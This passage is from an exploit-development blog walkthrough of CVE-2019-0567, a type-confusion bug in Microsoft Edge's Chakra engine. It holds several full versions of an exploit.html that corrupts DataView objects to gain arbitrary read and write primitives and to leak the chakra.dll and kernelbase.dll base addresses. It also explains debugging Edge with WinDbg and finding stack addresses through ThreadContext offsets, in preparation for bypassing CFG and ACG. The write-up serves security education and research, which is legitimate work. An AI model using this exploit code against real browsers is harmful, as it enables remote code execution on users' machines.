    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");
}
</script>

Nothing about this code differs in the slightest from our previous exploit.js code, except for the fact we are now using an HTML file, as this is the type of file Edge expects as a web browser. This also means that we have replaced print() functions with proper document.write() HTML methods in order to print our exploit output to the screen. We have also added a <script></script> tag to allow us to execute our malicious JavaScript in the browser. Additionally, we added the <button onclick="main()">Click me to exploit CVE-2019-0567!</button> line so that our exploit won’t be executed as soon as the web page is opened. Instead, this button allows us to choose when we want to detonate our exploit. This will aid us in debugging, as we will see shortly.

Once we have saved exploit.html, we can double-click on it and select Microsoft Edge as the application we want to open it with. From there, we should be presented with our Click me to exploit CVE-2019-0567 button.

After we have loaded the web page, we can then click on the button to run the code presented above for exploit.html.

As we can see, everything works as expected (per part two of this blog series) and, using our exploit primitive, we leak the vftable from one of our DataView objects, which is a pointer into chakra.dll. However, as we are exploiting Edge itself now and not the ChakraCore engine, computation of the base address of chakra.dll will be slightly different. To do this, we need to debug Microsoft Edge in order to compute the distance between our leaked address and chakra.dll’s base address, so we first need to talk about how to debug Edge.

We will begin by making use of Process Hacker to aid in our debugging. After downloading Process Hacker, we can go ahead and start it.

After starting Process Hacker, let’s go ahead and re-open exploit.html but do not click on the Click me to exploit CVE-2019-0567 button yet.

Coming back to Process Hacker, we can see two MicrosoftEdgeCP.exe processes and a MicrosoftEdge.exe process.

Where do these various processes come from? As the CP in MicrosoftEdgeCP.exe implies, these are Microsoft Edge content processes. A content process, also known as a renderer process, is the actual component of the browser which executes the JavaScript, HTML, and CSS code a user interfaces with. In this case, we can see two MicrosoftEdgeCP.exe processes. One of these processes refers to the actual content we are seeing (the actual exploit.html web page). The other MicrosoftEdgeCP.exe process is technically not a content process, per se, and is actually the out-of-process JIT server which we talked about previously in this blog series. What does this actually mean?

JIT’d code is code that is generated as readable, writable, and executable (RWX). This is also known as “dynamic code”, which is generated at runtime and doesn’t exist when the Microsoft Edge processes are spawned. We will talk about Arbitrary Code Guard (ACG) in a bit, but at a high level ACG prohibits any dynamic code (amongst other nuances we will speak of at the appropriate time) from being generated which is readable, writable, and executable (RWX). Since ACG is a mitigation which was actually developed with browser exploitation and Edge in mind, there is a slight usability issue. Since JIT’d code is a massive component of a modern-day browser, this automatically makes ACG incompatible with Edge. If ACG is enabled, then how can JIT’d code be generated, as it is RWX? The solution to this problem is to leverage an out-of-process JIT server (located in the second MicrosoftEdgeCP.exe process).

This JIT server process has Arbitrary Code Guard disabled. The reasoning is that the JIT process doesn’t execute any “untrusted” JavaScript, HTML, or CSS code provided by a web page, so the JIT server supposedly can’t be exploited by browser exploitation-related primitives, like a type confusion vulnerability (we will prove this assumption false with our ACG bypass). Since any code running within the JIT server is therefore considered “trusted”, there is no need to place “unnecessary constraints” on the process. With ACG not enabled, the JIT server process is compatible with JIT and can generate the RWX code that JIT requires. The main issue, however, is how do we get this code (which is currently in a separate process) into the appropriate content process where it will actually be executed?

The way this works is that the out-of-process JIT server will actually take any JIT’d code that needs to be executed, and it will inject it into the content processes that contain the JavaScript code to be executed, with proper permissions that are ACG compliant (generally readable/executable). So, at a high level, this out-of-process JIT server performs process injection to map the JIT’d code into the content processes (which have ACG enabled). This allows the Edge content processes, which are responsible for handling untrusted code like a web page that hosts malicious JavaScript to perform memory corruption (e.g. exploit.html), to have full ACG support.

Lastly, we have the MicrosoftEdge.exe process which is known as the browser process. It is the “main” process which helps to manage things like network requests and file access.

Armed with the above information, let’s now turn our attention back to Process Hacker.

The obvious point we can make is that when we do our exploit debugging, we know the content process is responsible for execution of the JavaScript code within our web page - meaning that it is the process we need to debug as it will be responsible for execution of our exploit. However, since the out-of-process JIT server is technically named as a content process, this makes for two instances of MicrosoftEdgeCP.exe. How do we know which is the out-of-process JIT server and which is the actual content process? This probably isn’t the best way to tell, but the way I figured this out with approximately 100% accuracy is by looking at the two content processes (MicrosoftEdgeCP.exe) and determining which one uses up more RAM. In my testing, the process which uses up more RAM is the target process for debugging (as it is significantly more, and makes sense as the content process has to load JavaScript, HTML, and CSS code into memory for execution). With that in mind, we can break down the process tree as such (based on the Process Hacker image above):

  1. MicrosoftEdge.exe - PID 3740 (browser process)
  2. MicrosoftEdgeCP.exe - PID 2668 (out-of-process JIT server)
  3. MicrosoftEdgeCP.exe - PID 2512 (content process - our “exploiting process” we want to debug).

With the aforementioned knowledge we can attach PID 2512 (our content process, which will likely differ on your machine) to WinDbg and know that this is the process responsible for execution of our JavaScript code. More importantly, this process loads the Chakra JavaScript engine DLL, chakra.dll.

After confirming chakra.dll is loaded into the process space, we can then click our Click me to exploit CVE-2019-0567 button (you may have to click it twice). This will run our exploit, and from here we can calculate the distance from the leaked pointer to the base of chakra.dll.

As we can see above, the leaked vftable pointer is 0x5d0bf8 bytes away from the base of chakra.dll. We can then update our exploit script to the following code, and confirm this to be the case.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");
}
</script>
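The subtraction in the listing above works on the low 32 bits only and leaves the high half untouched, which holds as long as the low half of the leaked pointer is larger than the offset. As a minimal sketch of the same arithmetic with an explicit borrow, assuming a hypothetical helper named sub64 (not part of the original exploit) and made-up example addresses:

```javascript
// Hypothetical helper (not part of the original exploit): subtract a small
// offset from a 64-bit address held as two unsigned 32-bit halves.
function sub64(lo, hi, offset) {
    var newLo = lo - offset;
    var newHi = hi;

    // If the low half underflowed, borrow one from the high half
    if (newLo < 0) {
        newLo += 0x100000000;
        newHi = newHi - 1;
    }

    return { lo: newLo >>> 0, hi: newHi >>> 0 };
}

// Illustrative values only; real addresses change because of ASLR
var leakLo = 0x5c6d0bf8;
var leakHi = 0x00007ffb;

// 0x5d0bf8 is the vftable-to-base distance measured in the text
var base = sub64(leakLo, leakHi, 0x5d0bf8);
```

With these example values no borrow occurs, so the result matches the simpler vtableLo - 0x5d0bf8 computation used in the listing.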

After computing the base address of chakra.dll the next thing we need to do is, as shown in part two, leak an import address table (IAT) entry that points to kernel32.dll (in this case kernelbase.dll, which contains all of the functionality of kernel32.dll).

Using the same debugging session, or a new one if you prefer (following the aforementioned steps to locate the content process), we can locate the IAT for chakra.dll with the !dh command.

If we dive a bit deeper into the IAT, we can see there are several pointers to kernelbase.dll, which contains many of the important APIs such as VirtualProtect we need to bypass DEP and ACG. Specifically, for our exploit, we will go ahead and extract the pointer to kernelbase!DuplicateHandle as our kernelbase.dll leak, as we will need this API in the future for our ACG bypass.

What this means is that we can use our read primitive to read what chakra_base+0x5ee2b8 points to (which is a pointer into kernelbase.dll). We can then compute the base address of kernelbase.dll by subtracting, from this leaked pointer, the offset of DuplicateHandle from the base of kernelbase.dll, which we can measure in the debugger.

We now know that DuplicateHandle is 0x18de0 bytes away from kernelbase.dll’s base address. Armed with this information, we can update exploit.html as follows and detonate it.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");
}
</script>
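One caveat when reading the printed addresses: hex(high) + hex(low) simply concatenates two strings, so any leading zeros in the low 32 bits are dropped and the printed value can come out shorter than the real address. A minimal sketch of a padded formatter, assuming a hypothetical helper named hex64 that is not part of the original exploit:

```javascript
// Hypothetical helper: format a 64-bit address from two 32-bit halves,
// zero-padding the low half to 8 hex digits so no digits are lost.
function hex64(hi, lo) {
    // ">>> 0" coerces to unsigned, in case a signed 32-bit value is passed in
    var low = (lo >>> 0).toString(16);
    while (low.length < 8) {
        low = "0" + low;
    }
    return "0x" + (hi >>> 0).toString(16) + low;
}

// Made-up example halves where the low half has leading zeros
var naive = "0x" + (0x7ffb).toString(16) + (0x1234).toString(16);
var padded = hex64(0x7ffb, 0x1234);
```

Here naive is the string produced by plain concatenation and padded is the full-width form. The values in this series happen to print correctly whenever the low half uses all 8 hex digits.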

We are now almost done porting our exploit primitives to Edge from ChakraCore. As we can recall from our ChakraCore exploit, the last thing we need to do now is leak a stack address/the stack in order to bypass CFG for control-flow hijacking and code execution.

Recall that this information derives from this Google Project Zero issue. As we can recall with our ChakraCore exploit, we computed these offsets in WinDbg and determined that ChakraCore leveraged slightly different offsets. However, since we are now targeting Edge, we can update the offsets to those mentioned by Ivan Fratric in this issue.

However, even though the type->scriptContext->threadContext offsets will be the ones mentioned in the Project Zero issue, the stack address offset is slightly different. We will go ahead and debug this with alert() statements.

We know we have to leak a type pointer (which we already have stored in exploit.html the same way as part two of this blog series) in order to leak a stack address. Let’s update our exploit.html with a few items to aid in our debugging for leaking a stack address.

<button onclick="main()">Click me to exploit CVE-2019-0567!</button>

<script>
// CVE-2019-0567: Microsoft Edge Type Confusion
// Author: Connor McGarr (@33y0re)

// Creating object obj
// Properties are stored via auxSlots since properties weren't declared inline
obj = {}
obj.a = 1;
obj.b = 2;
obj.c = 3;
obj.d = 4;
obj.e = 5;
obj.f = 6;
obj.g = 7;
obj.h = 8;
obj.i = 9;
obj.j = 10;

// Create two DataView objects
dataview1 = new DataView(new ArrayBuffer(0x100));
dataview2 = new DataView(new ArrayBuffer(0x100));

// Function to convert to hex for memory addresses
function hex(x) {
    return x.toString(16);
}

// Arbitrary read function
function read64(lo, hi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to read from (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Instead of returning a 64-bit value here, we will create a 32-bit typed array and return the entire array
    // Write primitive requires breaking the 64-bit address up into 2 32-bit values so this allows us an easy way to do this
    var arrayRead = new Uint32Array(0x10);
    arrayRead[0] = dataview2.getInt32(0x0, true);   // 4-byte arbitrary read
    arrayRead[1] = dataview2.getInt32(0x4, true);   // 4-byte arbitrary read

    // Return the array
    return arrayRead;
}

// Arbitrary write function
function write64(lo, hi, valLo, valHi) {
    dataview1.setUint32(0x38, lo, true);        // DataView+0x38 = dataview2->buffer
    dataview1.setUint32(0x3C, hi, true);        // We set this to the memory address we want to write to (4 bytes at a time: e.g. 0x38 and 0x3C)

    // Perform the write with our 64-bit value (broken into two 4 bytes values, because of JavaScript)
    dataview2.setUint32(0x0, valLo, true);       // 4-byte arbitrary write
    dataview2.setUint32(0x4, valHi, true);       // 4-byte arbitrary write
}

// Function used to set prototype on tmp function to cause type transition on o object
function opt(o, proto, value) {
    o.b = 1;

    let tmp = {__proto__: proto};

    o.a = value;
}

// main function
function main() {
    for (let i = 0; i < 2000; i++) {
        let o = {a: 1, b: 2};
        opt(o, {}, {});
    }

    let o = {a: 1, b: 2};

    opt(o, o, obj);     // Instead of supplying 0x1234, we are supplying our obj

    // Corrupt obj->auxSlots with the address of the first DataView object
    o.c = dataview1;

    // Corrupt dataview1->buffer with the address of the second DataView object
    obj.h = dataview2;

    // dataview1 methods act on dataview2 object
    // Since vftable is located from 0x0 - 0x8 in dataview2, we can simply just retrieve it without going through our read64() function
    vtableLo = dataview1.getUint32(0x0, true);
    vtableHigh = dataview1.getUint32(0x4, true);

    // Extract dataview2->type (located 0x8 - 0x10) so we can follow the chain of pointers to leak a stack address via...
    // ... type->javascriptLibrary->scriptContext->threadContext
    typeLo = dataview1.getUint32(0x8, true);
    typeHigh = dataview1.getUint32(0xC, true);

    // Print update
    document.write("[+] DataView object 2 leaked vtable from chakra.dll: 0x" + hex(vtableHigh) + hex(vtableLo));
    document.write("<br>");

    // Store the base of chakra.dll
    chakraLo = vtableLo - 0x5d0bf8;
    chakraHigh = vtableHigh;

    // Print update
    document.write("[+] chakra.dll base address: 0x" + hex(chakraHigh) + hex(chakraLo));
    document.write("<br>");

    // Leak a pointer to kernelbase.dll (KERNELBASE!DuplicateHandle) from the IAT of chakra.dll
    // chakra+0x5ee2b8 points to KERNELBASE!DuplicateHandle
    kernelbaseLeak = read64(chakraLo+0x5ee2b8, chakraHigh);

    // KERNELBASE!DuplicateHandle is 0x18de0 away from kernelbase.dll's base address
    kernelbaseLo = kernelbaseLeak[0]-0x18de0;
    kernelbaseHigh = kernelbaseLeak[1];

    // Store the pointer to KERNELBASE!DuplicateHandle (needed for our ACG bypass) into a more aptly named variable
    var duplicateHandle = new Uint32Array(0x4);
    duplicateHandle[0] = kernelbaseLeak[0];
    duplicateHandle[1] = kernelbaseLeak[1];

    // Print update
    document.write("[+] kernelbase.dll base address: 0x" + hex(kernelbaseHigh) + hex(kernelbaseLo));
    document.write("<br>");

    // ---------------------------------------------------------------------------------------------

    // Print update with our type pointer
    document.write("[+] type pointer: 0x" + hex(typeHigh) + hex(typeLo));
    document.write("<br>");

    // Spawn an alert dialogue to pause execution
    alert("DEBUG");
}
</script>

As we can see, we have added a document.write() call to print out the address of our type pointer (from which we will leak a stack address), and we also added an alert() call to create an “alert” dialogue. Since JavaScript will use temporary virtual memory for objects (e.g. memory that isn’t backed by a file on disk, unlike a 0x7fff address that is backed by a loaded DLL), this address is only “consistent” for the duration of the process. Think of this in terms of ASLR - when, on Windows, you reboot the system, you can expect images to be loaded at different addresses. This is synonymous with the longevity of the address/address space used for JavaScript objects, except that it is on a “per-script” basis and not a per-boot basis (“per-script” is a term I made up to represent the fact that the address of a JavaScript object will change each time the JavaScript code is run). This is the reason we have the document.write() call and the alert() call. The document.write() call will give us the address of our type object, and the alert() dialogue will work, in essence, like a breakpoint in that it will pause execution of JavaScript, HTML, or CSS code until the “alert” dialogue has been dealt with. In other words, the JavaScript code cannot finish executing until the dialogue is dismissed, meaning all of the JavaScript objects stay loaded in the content process until then. This will allow us to examine the type pointer before it goes out of scope. We will use this same “setup” (e.g. alert() calls) to our advantage in debugging in the future.

If we run our exploit two separate times, we can confirm our theory about the type pointer changing addresses each time the JavaScript executes.

Now, for “real” this time, let’s open up exploit.html in Edge and click the Click me to exploit CVE-2019-0567 button. This should bring up our “alert” dialogue.

As we can see, the type pointer is located at 0x1ca40d69100 (note you won’t be able to use copy and paste with the dialogue available, so you will have to manually type this value). Now that we know the address of the type pointer, we can use Process Hacker to locate our content process.

As we can see, the content process which uses the most RAM is PID 6464. This is our content process, where our exploit is currently executing (although paused). We now can use WinDbg to attach to the process and examine the memory contents of 0x1ca40d69100.

After inspecting the memory contents, we can confirm that this is a valid address - meaning our type pointer hasn’t gone out of scope! Although a bit of an arduous process, this is how we can successfully debug Edge for our exploit development!

Using the Project Zero issue as a guide, and leveraging the process outlined in part two of this blog series, we can walk various pointers within this structure to fetch a stack address!

The Google Project Zero issue explains that we essentially can just walk the type pointer to extract a ScriptContext structure which, in turn, contains ThreadContext. The ThreadContext structure is responsible, as we have seen, for storing various stack addresses. Here are the offsets:

  1. type + 0x8 = JavaScriptLibrary
  2. JavaScriptLibrary + 0x430 = ScriptContext
  3. ScriptContext + 0x5c0 = ThreadContext
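The pointer chain above can be sketched as a small loop. This is only an illustration under stated assumptions: readQword() and fakeMemory are hypothetical stand-ins for the exploit's read primitive, the intermediate JavaScriptLibrary and ScriptContext addresses are made up, and BigInt is used purely for readability in a modern JavaScript engine (the exploit itself works with two 32-bit halves).

```javascript
// Hypothetical stand-in for process memory: address -> 64-bit value stored there.
// Only the type pointer and the ThreadContext address come from the post;
// the two intermediate addresses are invented for this sketch.
const fakeMemory = new Map([
    [0x1ca40d69100n + 0x8n,   0x1ca40d00000n],  // type + 0x8 -> JavaScriptLibrary (made up)
    [0x1ca40d00000n + 0x430n, 0x1ca40e00000n],  // JavaScriptLibrary + 0x430 -> ScriptContext (made up)
    [0x1ca40e00000n + 0x5c0n, 0x1ca3d72a000n],  // ScriptContext + 0x5c0 -> ThreadContext
]);

// Hypothetical read primitive: returns the 64-bit value at an address
function readQword(address) {
    if (!fakeMemory.has(address)) {
        throw new Error("unmapped address 0x" + address.toString(16));
    }
    return fakeMemory.get(address);
}

// Offsets from the list above (specific to the build of Edge used in this post)
const CHAIN = [0x8n, 0x430n, 0x5c0n];

// Dereference each link in turn: type -> JavaScriptLibrary -> ScriptContext -> ThreadContext
function walkToThreadContext(typePointer) {
    let current = typePointer;
    for (const offset of CHAIN) {
        current = readQword(current + offset);
    }
    return current;
}

console.log("ThreadContext: 0x" + walkToThreadContext(0x1ca40d69100n).toString(16));
```

If an offset is wrong for your build, the walk will land on an unrelated value, so it is worth confirming each hop in WinDbg before trusting the result.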

In our case, the ThreadContext structure is located at 0x1ca3d72a000.

Previously, we leaked the stackLimitForCurrentThread member of ThreadContext, which gave us essentially the stack limit for the exploiting thread. However, take a look at this address within Edge (located at ThreadContext + 0x4f0)

If we try to examine the memory contents of this address, we can see they are not committed to memory. This obviously means this address doesn’t fall within the bounds of the TEB’s known stack address(es) for our current thread.

As we can recall from part two, this was also the case. However, in ChakraCore, we could compute the offset from the leaked stackLimitForCurrentThread consistently between exploit attempts. Let’s compute the distance from our leaked stackLimitForCurrentThread with the actual stack limit from the TEB.

Here, at this point in the exploit, the leaked stack address is 0x1cf0000 bytes away from the actual stack limit we leaked via the TEB. Let’s exit out of WinDbg and re-run our exploit, while also leaking our stack address within WinDbg.

Our type pointer is located at 0x157acb19100.

After attaching Edge to WinDbg and walking the type object, we can see our leaked stack address via stackLimitForCurrentThread.

As we can see above, when computing the offset, our offset has changed to 0x1c90000 bytes away from the actual stack limit. This poses a problem for us, as we cannot reliably compute the offset to the stack limit. Since the stack limit saved in the ThreadContext structure (stackLimitForCurrentThread) is not committed to memory, we will get an access violation when attempting to dereference it. This means our exploit would be killed, so we also can’t “guess” the offset if we want our exploit to be reliable.
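To put a number on the variance, here is a quick piece of arithmetic using only the two offsets observed above. The 4 KB page size is an assumption (the usual x64 Windows page size), not something measured in this post.

```javascript
// Offsets between stackLimitForCurrentThread and the TEB stack limit, from the two runs above
const offsetRun1 = 0x1cf0000;
const offsetRun2 = 0x1c90000;

// How far apart the two offsets are
const drift = offsetRun1 - offsetRun2;

// Assumption: 4 KB pages
const PAGE_SIZE = 0x1000;

console.log("Drift between runs: 0x" + drift.toString(16) + " bytes");
console.log("Drift in pages: " + (drift / PAGE_SIZE));
```

Even across just two runs the offsets disagree by 0x60000 bytes, which is far too much to paper over with a hardcoded constant.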

Before I pose the solution, I wanted to touch on something I first tried. Within the ThreadContext structure, there is a global variable named globalListFirst. This seems to be a linked-list within a ThreadContext structure which is used to track other instances of a ThreadContext structure. At an offset of 0x10 within this list (consistently, I found, in every attempt I made) there is actually a pointer to the heap.

Since it is possible via stackLimitForCurrentThread to at least leak an address around the current stack limit (with the upper 32-bits being the same across all stack addresses), and although there is a degree of variance between the offset from stackLimitForCurrentThread and the actual current stack limit (around 0x1cX0000 bytes as we saw between our two stack leak attempts), I used my knowledge of the heap to do the following:

  1. Leak the heap from chakra!ThreadContext::globalListFirst
  2. Using the read primitive, scan the heap for any stack addresses that are greater than the leaked stack address from stackLimitForCurrentThread
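A rough sketch of the filtering in step 2 is below. It assumes the heap has already been read into an array of [low dword, high dword] pairs (the sample values are made up), and it leans on the observation above that stack addresses share the same upper 32 bits. findStackCandidates() is a hypothetical helper name, not something from the exploit.

```javascript
// Keep only values that share the leaked address's upper 32 bits
// and sit above the leaked address in the lower 32 bits
function findStackCandidates(heapQwords, leakLo, leakHi) {
    const candidates = [];
    for (const [lo, hi] of heapQwords) {
        if (hi === leakHi && lo > leakLo) {
            candidates.push([lo, hi]);
        }
    }
    return candidates;
}

// Made-up heap contents for illustration: [low dword, high dword]
const heapSample = [
    [0x2affb000, 0x1c],     // looks like a stack address above the leak
    [0x10000000, 0x1c],     // same upper 32 bits, but below the leak
    [0x3a454a73, 0x7fff],   // pointer into a loaded module, not the stack
    [0x2affc120, 0x1c],     // another candidate
];

const found = findStackCandidates(heapSample, 0x2a000000, 0x1c);
console.log("Candidates found: " + found.length);
```

A filter like this says nothing about whether a candidate is committed, which is exactly why this approach still failed a good portion of the time.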

I found that about 50-60% of the time I could leak a stack address from the heap. From there, about 50% of the time the stack address that was leaked from the heap was committed to memory. However, there was a varying degree of “failure” - meaning I would often get an access violation on the leaked stack address from the heap. Although I was only succeeding in about half of the exploit attempts, this is significantly better than trying to “guess” the offset from stackLimitForCurrentThread. However, after I got frustrated with this, I saw there was a much easier approach.

The reason why I didn’t take this approach earlier, is because the stackLimitForCurrentThread seemed to be from a thread stack which was no longer in memory. This can be seen below.

Looking at the above image, we can see only one active thread has a stack address that is anywhere near stackLimitForCurrentThread. However, if we look at the TEB for that single thread, the stack address we are leaking doesn’t fall anywhere within that range. This was disheartening for me, as I assumed any stack address I leaked from this ThreadContext structure was from a thread which was no longer active and, thus, whose stack address space had been decommitted. However, in the Google Project Zero issue, stackLimitForCurrentThread wasn’t the item leaked - it was leafInterpreterFrame. Since I had enjoyed success with stackLimitForCurrentThread in part two of this blog series, it didn’t cross my mind until much later to investigate this specific member.

If we take a look at the ThreadContext structure, we can see that there is a stack address at offset 0x8f0.

In fact, we can see two stack addresses. Both of them are committed to memory, as well!

If we compare this to Ivan’s findings in the Project Zero issue, we can see that he leaks two stack addresses at offsets 0x8a0 and 0x8a8, just like we have leaked them at 0x8f0 and 0x8f8. We can therefore infer that these are the same stack addresses from the leafInterpreterFrame member of ThreadContext, and that we are likely on a different version of Windows than Ivan, which likely means a different version of Edge and, thus, the slight difference in offset. For our exploit, you can choose either of these addresses. I opted for ThreadContext + 0x8f8.

Additionally, if we look at the address itself (0x1c2affaf60), we can see that this address doesn’t reside within the current thread.

